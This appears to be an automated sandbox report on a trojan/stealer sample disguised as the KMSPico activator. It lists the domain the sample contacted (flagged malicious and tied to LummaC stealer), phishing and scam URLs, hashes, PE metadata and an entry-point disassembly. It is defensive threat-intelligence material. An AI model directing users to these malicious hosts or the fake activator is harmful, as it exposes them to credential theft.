https://duckduckgo.com/ac/?q= | KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2036088652.0000000004B36000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://technologyenterdo.shop/& | KMSPico.exe, 00000000.00000003.2066524885.0000000002604000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2063814248.0000000002602000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://technologyenterdo.shop/1 | KMSPico.exe, 00000000.00000003.2034989504.0000000002593000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2036088652.0000000004B36000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://upx.sf.net | Amcache.hve.4.dr | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | KMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://technologyenterdo.shop/J | KMSPico.exe, 00000000.00000003.2121001865.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259172539.00000000025EC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://x1.c.lencr.org/0 | KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://x1.i.lencr.org/0 | KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://technologyenterdo.shop/apis | KMSPico.exe, 00000000.00000003.2121121404.0000000002606000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2121001865.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259320177.0000000002607000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2121026380.00000000025F8000.00000004.00000020.00020000.00000000.sdmp | false | 14%, Virustotal; Avira URL Cloud: safe | unknown
https://technologyenterdo.shop/y | KMSPico.exe, 00000000.00000003.2120848837.0000000002586000.00000004.00000020.00020000.00000000.sdmp | false | 15%, Virustotal; Avira URL Cloud: safe | unknown
https://support.mozilla.org/products/firefoxgro.all | KMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://technologyenterdo.shop/ | KMSPico.exe, 00000000.00000003.2120848837.0000000002586000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259172539.00000000025EC000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2063814248.0000000002602000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2053752009.0000000002601000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2089735243.0000000002601000.00000004.00000020.00020000.00000000.sdmp | false | 15%, Virustotal; Avira URL Cloud: safe | unknown
https://technologyenterdo.shop/? | KMSPico.exe, 00000000.00000003.2053752009.0000000002601000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2089735243.0000000002601000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://technologyenterdo.shop/apik4 | KMSPico.exe, 00000000.00000003.2090458724.0000000002604000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2082443424.0000000002604000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2066524885.0000000002604000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2063814248.0000000002602000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2089735243.0000000002601000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.80.118 | technologyenterdo.shop | United States | 13335 | CLOUDFLARENETUS | true
                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1400640
                                    Start date and time:2024-02-29 01:47:03 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 32s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:8
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:KMSPico.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@2/5@2/1
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 3
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.189.173.20
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target KMSPico.exe, PID 3648 because there are no executed functions
                                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • Report size getting too big, too many NtCreateFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
01:47:52 | API Interceptor | 8x Sleep call for process: KMSPico.exe modified
01:48:16 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                    No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
technologyenterdo.shop | Br3u0QVhyZ.exe | malicious | LummaC | 172.67.180.132
technologyenterdo.shop | sE76IBM72M.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, PureLog Stealer | 172.67.180.132
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://28febmich14.z13.web.core.windows.net/ | malicious | TechSupportScam | 172.67.38.66
CLOUDFLARENETUS | https://m-facebookz2b.gxscv.com/vhsfhqpdhdsih6/ | malicious | Unknown | 172.67.140.176
CLOUDFLARENETUS | https://web-mail-attaccount-ver005115.weeblysite.com/IP: | malicious | Unknown | 162.159.136.66
CLOUDFLARENETUS | https://privatedetectivesa.co.za/images/foot/jhvjh/l | malicious | HTMLPhisher | 104.17.2.184
CLOUDFLARENETUS | https://kembaliketarifnormal-6500bni.pages.dev/IP: | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | https://amkiyuerbxl89s5ykhzkggyspw8igsactb.pages.dev/smart89/IP: | malicious | Unknown | 172.66.44.150
CLOUDFLARENETUS | https://rzowbflicpqjmxky.z13.web.core.windows.net/?bcda=1-888-632-0151IP: | malicious | TechSupportScam | 104.21.41.125
CLOUDFLARENETUS | sharepoint-docusign009_message.html | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | http://kembaliketarifnormal-6-500bnl.gadismanis4.com/IP: | malicious | Unknown | 172.67.184.155
CLOUDFLARENETUS | https://shorturl.at/jlpEO | malicious | HtmlDropper, HTMLPhisher | 104.17.2.184
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | scan-28-02-24_6806.xlsx | malicious | Unknown | 104.21.80.118
a0e9f5d64349fb13191bc781f81f42e1 | scan-28-02-24_4822.xlsx | malicious | DarkGate, MailPassView | 104.21.80.118
a0e9f5d64349fb13191bc781f81f42e1 | scanned_doc#2024-27-2_3315.xlsx | malicious | Unknown | 104.21.80.118
a0e9f5d64349fb13191bc781f81f42e1 | scanned_doc#2024-27-2_2499.xlsx | malicious | Unknown | 104.21.80.118
a0e9f5d64349fb13191bc781f81f42e1 | scanned_doc#2024-27-2_9290.xlsx | malicious | Unknown | 104.21.80.118
a0e9f5d64349fb13191bc781f81f42e1 | scanned_doc#2024-27-2_9631.xlsx | malicious | Unknown | 104.21.80.118
a0e9f5d64349fb13191bc781f81f42e1 | scanned_doc#2024-27-2_1662.xlsx | malicious | Unknown | 104.21.80.118
a0e9f5d64349fb13191bc781f81f42e1 | scanned_doc#2024-27-2_4864.xlsx | malicious | Unknown | 104.21.80.118
a0e9f5d64349fb13191bc781f81f42e1 | scanned_doc#2024-27-2_7261.xlsx | malicious | Unknown | 104.21.80.118
a0e9f5d64349fb13191bc781f81f42e1 | scanned_doc#2024-27-2_9336.xlsx | malicious | Unknown | 104.21.80.118
                                    No context
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.9820825137729422
                                    Encrypted:false
                                    SSDEEP:96:6TSeREou+Eszx1Yzjv9fDUQXIDcQNc67cElcw38N+HbHg/8BRTf3o8Fa9SAOyPut:sdyv+EVb0D/fTjtdFDzuiFUZ24IO8ym
                                    MD5:0EC54C15C30E2F00A1B3275E5F6A7FE3
                                    SHA1:B28EC411DD0AA3CD7BCB65931B7DC8C0DA0C2AF2
                                    SHA-256:4870FEE31EF70A6B9B6145E7662D3684366CBF661CD39862D699818AFC96133A
                                    SHA-512:18605ADD00FF7616C80281C538FD496E436F504D5F9B136B8F420961FB64C658677AAEEE777189534D60D68E961F046C54EE5BCE4351586967A6CCC682A11CC5
                                    Malicious:false
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.3.6.4.1.2.8.3.5.8.7.3.5.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.3.6.4.1.2.8.5.6.3.4.2.2.3.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.3.9.c.c.a.b.6.-.5.3.c.c.-.4.d.3.8.-.b.1.a.e.-.4.0.2.0.0.a.3.8.6.9.b.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.9.d.5.c.f.e.-.f.8.0.0.-.4.6.5.c.-.9.3.9.b.-.0.d.f.9.7.d.4.d.2.d.c.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.K.M.S.P.i.c.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.4.0.-.0.0.0.1.-.0.0.1.4.-.9.5.8.6.-.8.9.e.a.a.8.6.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.8.0.2.5.b.3.2.a.5.7.4.9.8.b.4.d.4.9.b.1.7.8.0.9.b.0.3.a.c.d.c.0.0.0.0.9.c.1.4.!.0.0.0.0.c.7.a.d.e.6.1.2.e.6.0.5.3.c.7.6.5.2.6.9.8.d.4.3.1.f.5.9.c.7.e.d.4.3.a.5.7.f.1.9.!.K.M.S.P.i.c.o...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Thu Feb 29 00:48:05 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):51830
                                    Entropy (8bit):2.869063610021232
                                    Encrypted:false
                                    SSDEEP:192:eRMZXXBiLwIG0OLBcP6P64R4tw6PUaJvjU54zPOFQLygtnJGIzs4RtpjUMeqH9+Z:AGBiLwLLBPP6tGMoefLttJGS5tpjqqQZ
                                    MD5:F3DF7807CE9A3F051B810AFCA10AADE9
                                    SHA1:28CFF110D497D21340950B286FDB30B26A33C1EE
                                    SHA-256:4C4C73B30CCCA65563BDB08003EF62E6D26F4152833A941004C74E1E83FEF3FA
                                    SHA-512:DB75936DAD993A483B5C58CB3130137A23BAC374BC900FC808BD2FAB04FD10EBFFFBD31843F8FA83211EDEF64E89F10DA9F58BF76B441BD5920D32A6767179AD
                                    Malicious:false
                                    Reputation:low
                                    Preview:MDMP..a..... .......E..e............4...........8...H.......,...............J0..........`.......8...........T...........(=..N........................!..............................................................................eJ......0"......GenuineIntel............T.......@...4..e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8320
                                    Entropy (8bit):3.697692850713784
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJYA61Ab6YEICSULz4gmfvj4+pDv89bePsfpKm:R6lXJn6126YE9SUn4gmfL4De0fl
                                    MD5:1FBB925EBADE91DD96876474E4D152C3
                                    SHA1:3290B09A41DF8D5611CD2F21E0B1C3AE6C05B89B
                                    SHA-256:9EBD112BEDA7FF06D28D1FE9DFA3EBDF1EC0F392B211482BF7B3171DDBD1D273
                                    SHA-512:50903F0EE54437047BA3FF7CFF7461A48924247178F231DCBD0F345AA0C6FD60A58FAD358ACB72BF13E8E13D833E7D3DB6A6FAF4A5B820807F4B743A52AD1B1E
                                    Malicious:false
                                    Reputation:low
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.6.4.8.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4562
                                    Entropy (8bit):4.459653068252717
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsEJg77aI9SNWpW8VYpYm8M4JvtFjnm+q8gZTwiuId:uIjfCI7I87V1JjnmrUiuId
                                    MD5:CA370F97A001C5D25982C9D2103B80EF
                                    SHA1:DACE386F84188F0BCCACB3C506EAA8CE176CE59F
                                    SHA-256:696D69EBA6D53A9085A29D552C1EDC19C39D87A0D246F8B523C74267BFFD4841
                                    SHA-512:0616A6112C975400BE8C334B8AF4468D93B2A1EE129F9B386D3F4D5E5DDF6001C5480A88072047D2C82B0FDBBF7E976F08C919CB9391159769F936897C209907
                                    Malicious:false
                                    Reputation:low
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="214070" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.421508203105066
                                    Encrypted:false
                                    SSDEEP:6144:MSvfpi6ceLP/9skLmb0OT5WSPHaJG8nAgeMZMMhA2fX4WABlEnN10uhiTw:3vloT5W+EZMM6DFyL03w
                                    MD5:CD9476B23A8101AF09D3290D696821C5
                                    SHA1:B92CFB4957BA1D4DEE99B3829ADD53348849906E
                                    SHA-256:9B101C94834BE91D6F449086D25B16E6509D92AFFBADBE28E4318FA4D95644BE
                                    SHA-512:6EAFC2CF1CB88A79CDB7BBFC17CB57ABD00313F00A6AE50FBF087498B22B6D311FE5CB11AA2E7A945AF85075DE59E6FB48129F39E9EF5E3B024AA5C5D4349913
                                    Malicious:false
                                    Reputation:low
                                    Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...j...............................................................................................................................................................................................................................................................................................................................................}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.331170903296359
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:KMSPico.exe
                                    File size:287'744 bytes
                                    MD5:e46fcde17771922059b7a826ec4e4ca3
                                    SHA1:c7ade612e6053c7652698d431f59c7ed43a57f19
                                    SHA256:e2e733137df2e1a7d726335f8ae4d1b4ce83ef2d1d3db2651c23db1a24c918f0
                                    SHA512:e510e2d16920e077dc55da1c20a176d8a7147c28ca828635f8c6c5ad0083f6b64c4b794ec4c4c7408f1cbfc65fcf6744f7ce8cef9ee9b90e57c630ca7a8cd1d1
                                    SSDEEP:6144:1Y3DCZutB4lBjV9d1aZJzuQSoXCbreMbi5N7R397:1Y2Zuf4lf3kJzu9oX8LiP7
                                    TLSH:2E54F02633D0C839D4A621319862DBB54A7BFCA12D35858B77A03B3F9E212C19A3575A
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................M.......x.......L.......u...............I.......|.......{.....Rich............PE..L...WI.d...................
                                    Icon Hash:1319712306413347
                                    Entrypoint:0x401637
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x64F24957 [Fri Sep 1 20:28:07 2023 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:3e9a9cf66c4a31d33ef1279b5d62e5f6
                                    Instruction
                                    call 00007F4608C11B56h
                                    jmp 00007F4608C0E9BEh
                                    mov edi, edi
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 00000328h
                                    mov dword ptr [00440258h], eax
                                    mov dword ptr [00440254h], ecx
                                    mov dword ptr [00440250h], edx
                                    mov dword ptr [0044024Ch], ebx
                                    mov dword ptr [00440248h], esi
                                    mov dword ptr [00440244h], edi
                                    mov word ptr [00440270h], ss
                                    mov word ptr [00440264h], cs
                                    mov word ptr [00440240h], ds
                                    mov word ptr [0044023Ch], es
                                    mov word ptr [00440238h], fs
                                    mov word ptr [00440234h], gs
                                    pushfd
                                    pop dword ptr [00440268h]
                                    mov eax, dword ptr [ebp+00h]
                                    mov dword ptr [0044025Ch], eax
                                    mov eax, dword ptr [ebp+04h]
                                    mov dword ptr [00440260h], eax
                                    lea eax, dword ptr [ebp+08h]
                                    mov dword ptr [0044026Ch], eax
                                    mov eax, dword ptr [ebp-00000320h]
                                    mov dword ptr [004401A8h], 00010001h
                                    mov eax, dword ptr [00440260h]
                                    mov dword ptr [0044015Ch], eax
                                    mov dword ptr [00440150h], C0000409h
                                    mov dword ptr [00440154h], 00000001h
                                    mov eax, dword ptr [0043E004h]
                                    mov dword ptr [ebp-00000328h], eax
                                    mov eax, dword ptr [0043E008h]
                                    mov dword ptr [ebp-00000324h], eax
                                    call dword ptr [000000CCh]
                                    Programming Language:
                                    • [C++] VS2010 build 30319
                                    • [ASM] VS2010 build 30319
                                    • [ C ] VS2010 build 30319
                                    • [IMP] VS2008 SP1 build 30729
                                    • [RES] VS2010 build 30319
                                    • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d25c | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1ee7000 | 0x75c8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3b000 | 0x19c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3916b | 0x39200 | 5877f4d9d3d75f2d0e68f955c984cda7 | False | 0.8708971553610503 | data | 7.7446509642308685 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x3b000 | 0x2bd0 | 0x2c00 | 791bfb0d303e561e778d755e2ed7cd98 | False | 0.36665482954545453 | data | 4.969085311343728 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x1ea812c | 0x2c00 | b313328d111fa566ef4c77fbed6c84c2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x1ee7000 | 0x75c8 | 0x7600 | 0fcca62874bb692c787b19fb33d7b772 | False | 0.5990466101694916 | data | 5.31913405116205 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x1eecbc8 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | English | United States | 0.4276315789473684
RT_CURSOR | 0x1eecd10 | 0x134 | Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.75
RT_CURSOR | 0x1eece60 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.31023454157782515
RT_ICON | 0x1ee7420 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.69136460554371
RT_ICON | 0x1ee82c8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.7292418772563177
RT_ICON | 0x1ee8b70 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.6394009216589862
RT_ICON | 0x1ee9238 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.5852601156069365
RT_ICON | 0x1ee97a0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.6434647302904565
RT_ICON | 0x1eebd48 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | English | United States | 0.7553278688524591
RT_ICON | 0x1eec6d0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States | 0.8351063829787234
RT_STRING | 0x1eeded8 | 0xe0 | data | English | United States | 0.5491071428571429
RT_STRING | 0x1eedfb8 | 0x610 | data | English | United States | 0.43427835051546393
RT_ACCELERATOR | 0x1eecba0 | 0x28 | data | English | United States | 1.0
RT_GROUP_CURSOR | 0x1eeccf8 | 0x14 | data | English | United States | 1.15
RT_GROUP_CURSOR | 0x1eece48 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x1eedd08 | 0x14 | data | English | United States | 1.25
RT_GROUP_ICON | 0x1eecb38 | 0x68 | data | English | United States | 0.7115384615384616
RT_VERSION | 0x1eedd20 | 0x1b4 | data | English | United States | 0.573394495412844
DLL | Import
